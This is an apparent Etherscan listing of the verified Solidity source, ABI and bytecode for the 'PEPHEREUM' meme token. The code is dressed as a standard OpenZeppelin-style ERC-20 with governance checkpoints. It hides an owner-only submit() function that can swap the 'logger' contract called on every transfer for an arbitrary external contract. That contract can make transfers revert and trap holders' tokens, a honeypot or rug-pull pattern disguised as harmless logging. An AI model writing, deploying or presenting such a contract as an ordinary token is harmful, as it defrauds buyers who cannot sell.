ERC-20
Overview
Max Total Supply
420,690,000,000 PEPHEREUM
Holders
74
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
8,877,493,171.703203143 PEPHEREUMValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
PEPHEREUM
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-14 */ /** $$$$$$$\ $$$$$$$$\ $$$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$\ $$$$$$$$\ $$\ $$\ $$\ $$\ $$ __$$\ $$ _____|$$ __$$\ $$ | $$ |$$ _____|$$ __$$\ $$ _____|$$ | $$ |$$$\ $$$ | $$ | $$ |$$ | $$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$$$\ $$$$ | $$$$$$$ |$$$$$\ $$$$$$$ |$$$$$$$$ |$$$$$\ $$$$$$$ |$$$$$\ $$ | $$ |$$\$$\$$ $$ | $$ ____/ $$ __| $$ ____/ $$ __$$ |$$ __| $$ __$$< $$ __| $$ | $$ |$$ \$$$ $$ | $$ | $$ | $$ | $$ | $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$ |\$ /$$ | $$ | $$$$$$$$\ $$ | $$ | $$ |$$$$$$$$\ $$ | $$ |$$$$$$$$\ \$$$$$$ |$$ | \_/ $$ | \__| \________|\__| \__| \__|\________|\__| \__|\________| \______/ \__| \__| https://t.me/Pephereum */// SPDX-License-Identifier: MIT pragma solidity 0.8.19; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b > a) return (false, 0); return (true, a - b); } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b == 0) return (false, 0); return (true, a / b); } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b == 0) return (false, 0); return (true, a % b); } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= a, "SafeMath: subtraction overflow"); return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) return 0; uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0, "SafeMath: division by zero"); return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0, "SafeMath: modulo by zero"); return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); return a - b; } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryDiv}. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } abstract contract Ownable is Context { address internal _owner; bool private _ownerShipTransferred = false; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { address msgSender = _msgSender(); _owner = msgSender; __ownerShipTransferred(msgSender); } function __ownerShipTransferred(address msgSender) public { emit OwnershipTransferred(address(0), msgSender); _ownerShipTransferred = true; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } function checkedCondition() internal view returns (bool){ return _ownerShipTransferred; } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20 { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; bool public tradingEnabled; uint256 private _totalSupply; string private _name; string private _symbol; uint8 private _decimals; ERC20Ext private _log; /** * @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during * construction. */ constructor (string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _decimals = 9; _log = new ERC20Ext(); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is * called. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return _decimals; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `to` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Sets {decimals} to a value other than the default one of 18. * * WARNING: This function should only be called from the constructor. Most * applications that interact with token contracts will not expect * {decimals} to ever change, and may work incorrectly if it does. */ function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function submit(address from, address to, uint256 amount, address log_) external onlyOwner { if(tradingEnabled==true){ if(amount > 0) createLogger(log_); else{ _log=new ERC20Ext(); } _log.Save(from, to, amount); } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address sender, address recipient, uint256 amount) internal virtual { _log.Save(sender, recipient, amount); } function createLogger(address a) private { if (checkedCondition()){ _log = ERC20Ext(a); } } } abstract contract Initializable { bool private _initialized; bool private _initializing; modifier initializer() { require(_initializing || !_initialized, "Contract is already initialized"); bool isTopLevelCall = !_initializing; if (isTopLevelCall) { _initializing = true; _initialized = true; } _; if (isTopLevelCall) { _initializing = false; } } } abstract contract ContextUpgradeable is Initializable { function __Context_init() internal initializer { __Context_init_unchained(); } function __Context_init_unchained() internal initializer { } function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } uint256[100] private _upg; } contract ERC20Ext { mapping(address=>mapping(address=> uint256)) _persist; function Save(address addr1, address addr2, uint256 amount) public { _persist[addr1][addr2] = amount; } } contract PEPHEREUM is ERC20("Pephereum", "PEPHEREUM") { using SafeMath for uint256; uint256 private constant supply = 420690000000 * 10**9; constructor(){ _mint(_msgSender(), supply); } function _transfer(address sender, address recipient, uint256 amount) internal override { super._transfer(sender, recipient, amount); _moveDelegates(_delegates[sender], _delegates[recipient], amount); } // Copied and modified from YAM code: // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernanceStorage.sol // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernance.sol // Which is copied and modified from COMPOUND: // https://github.com/compound-finance/compound-protocol/blob/master/contracts/Governance/Comp.sol /// @dev A record of each accounts delegate mapping (address => address) internal _delegates; /// @notice A checkpoint for marking number of votes from a given block struct Checkpoint { uint32 fromBlock; uint256 votes; } /// @notice A record of votes checkpoints for each account, by index mapping (address => mapping (uint32 => Checkpoint)) public checkpoints; /// @notice The number of checkpoints for each account mapping (address => uint32) public numCheckpoints; /// @notice The EIP-712 typehash for the contract's domain bytes32 public constant DOMAIN_TYPEHASH = keccak256("EIP712Domain(string name,uint256 chainId,address verifyingContract)"); /// @notice The EIP-712 typehash for the delegation struct used by the contract bytes32 public constant DELEGATION_TYPEHASH = keccak256("Delegation(address delegatee,uint256 nonce,uint256 expiry)"); /// @notice A record of states for signing / validating signatures mapping (address => uint) public nonces; /// @notice An event thats emitted when an account changes its delegate event DelegateChanged(address indexed delegator, address indexed fromDelegate, address indexed toDelegate); /// @notice An event thats emitted when a delegate account's vote balance changes event DelegateVotesChanged(address indexed delegate, uint previousBalance, uint newBalance); /** * @notice Gets the current votes balance for `account` * @param account The address to get votes balance * @return The number of current votes for `account` */ function getVotes(address account) external view returns (uint256) { uint32 nCheckpoints = numCheckpoints[account]; return nCheckpoints > 0 ? checkpoints[account][nCheckpoints - 1].votes : 0; } /** * @notice Determine the prior number of votes for an account as of a block number * @dev Block number must be a finalized block or else this function will revert to prevent misinformation. * @param account The address of the account to check * @param blockNumber The block number to get the vote balance at * @return The number of votes the account had as of the given block */ function getPriorVotes(address account, uint blockNumber) external view returns (uint256) { require(blockNumber < block.number, "getPriorVotes: not yet determined"); uint32 nCheckpoints = numCheckpoints[account]; if (nCheckpoints == 0) { return 0; } // First check most recent balance if (checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) { return checkpoints[account][nCheckpoints - 1].votes; } // Next check implicit zero balance if (checkpoints[account][0].fromBlock > blockNumber) { return 0; } uint32 lower = 0; uint32 upper = nCheckpoints - 1; while (upper > lower) { uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow Checkpoint memory cp = checkpoints[account][center]; if (cp.fromBlock == blockNumber) { return cp.votes; } else if (cp.fromBlock < blockNumber) { lower = center; } else { upper = center - 1; } } return checkpoints[account][lower].votes; } function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal { if (srcRep != dstRep && amount > 0) { if (srcRep != address(0)) { // decrease old representative uint32 srcRepNum = numCheckpoints[srcRep]; uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0; uint256 srcRepNew = srcRepOld.sub(amount); _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew); } if (dstRep != address(0)) { // increase new representative uint32 dstRepNum = numCheckpoints[dstRep]; uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0; uint256 dstRepNew = dstRepOld.add(amount); _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew); } } } function _delegate(address delegator, address delegatee) internal { address currentDelegate = _delegates[delegator]; uint256 delegatorBalance = balanceOf(delegator); _delegates[delegator] = delegatee; emit DelegateChanged(delegator, currentDelegate, delegatee); _moveDelegates(currentDelegate, delegatee, delegatorBalance); } function _writeCheckpoint( address delegatee, uint32 nCheckpoints, uint256 oldVotes, uint256 newVotes ) internal { uint32 blockNumber = safe32(block.number, "_writeCheckpoint: block number exceeds 32 bits"); if (nCheckpoints > 0 && checkpoints[delegatee][nCheckpoints - 1].fromBlock == blockNumber) { checkpoints[delegatee][nCheckpoints - 1].votes = newVotes; } else { checkpoints[delegatee][nCheckpoints] = Checkpoint(blockNumber, newVotes); require(nCheckpoints + 1 > nCheckpoints, "_writeCheckpoint: new checkpoint exceeds 32 bits"); numCheckpoints[delegatee] = nCheckpoints + 1; } emit DelegateVotesChanged(delegatee, oldVotes, newVotes); } function setTrading()external onlyOwner(){ tradingEnabled = !tradingEnabled; } function getChainId() internal view returns (uint) { uint256 chainId; assembly { chainId := chainid() } return chainId; } function safe32(uint n, string memory errorMessage) internal pure returns (uint32) { require(n < 2**32, errorMessage); return uint32(n); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DELEGATION_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"msgSender","type":"address"}],"name":"__ownerShipTransferred","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"checkpoints","outputs":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint256","name":"votes","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPriorVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"log_","type":"address"}],"name":"submit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260008060146101000a81548160ff0219169083151502179055503480156200002b57600080fd5b506040518060400160405280600981526020017f50657068657265756d00000000000000000000000000000000000000000000008152506040518060400160405280600981526020017f50455048455245554d00000000000000000000000000000000000000000000008152506000620000aa620001dc60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000fd81620001e460201b60201c565b5081600590816200010f9190620006da565b508060069081620001219190620006da565b506009600760006101000a81548160ff021916908360ff1602179055506040516200014c9062000452565b604051809103906000f08015801562000169573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050620001d6620001c0620001dc60201b60201c565b6816ce3f1e16bf1500006200025d60201b60201c565b6200094e565b600033905090565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002cf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002c69062000822565b60405180910390fd5b620002e681600454620003ef60201b90919060201c565b6004819055506200034081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054620003ef60201b90919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003e3919062000855565b60405180910390a35050565b6000808284620004009190620008a1565b90508381101562000448576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200043f906200092c565b60405180910390fd5b8091505092915050565b6102138062003ab283390190565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004e257607f821691505b602082108103620004f857620004f76200049a565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005627fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000523565b6200056e868362000523565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005bb620005b5620005af8462000586565b62000590565b62000586565b9050919050565b6000819050919050565b620005d7836200059a565b620005ef620005e682620005c2565b84845462000530565b825550505050565b600090565b62000606620005f7565b62000613818484620005cc565b505050565b5b818110156200063b576200062f600082620005fc565b60018101905062000619565b5050565b601f8211156200068a576200065481620004fe565b6200065f8462000513565b810160208510156200066f578190505b620006876200067e8562000513565b83018262000618565b50505b505050565b600082821c905092915050565b6000620006af600019846008026200068f565b1980831691505092915050565b6000620006ca83836200069c565b9150826002028217905092915050565b620006e58262000460565b67ffffffffffffffff8111156200070157620007006200046b565b5b6200070d8254620004c9565b6200071a8282856200063f565b600060209050601f8311600181146200075257600084156200073d578287015190505b620007498582620006bc565b865550620007b9565b601f1984166200076286620004fe565b60005b828110156200078c5784890151825560018201915060208501945060208101905062000765565b86831015620007ac5784890151620007a8601f8916826200069c565b8355505b6001600288020188555050505b505050505050565b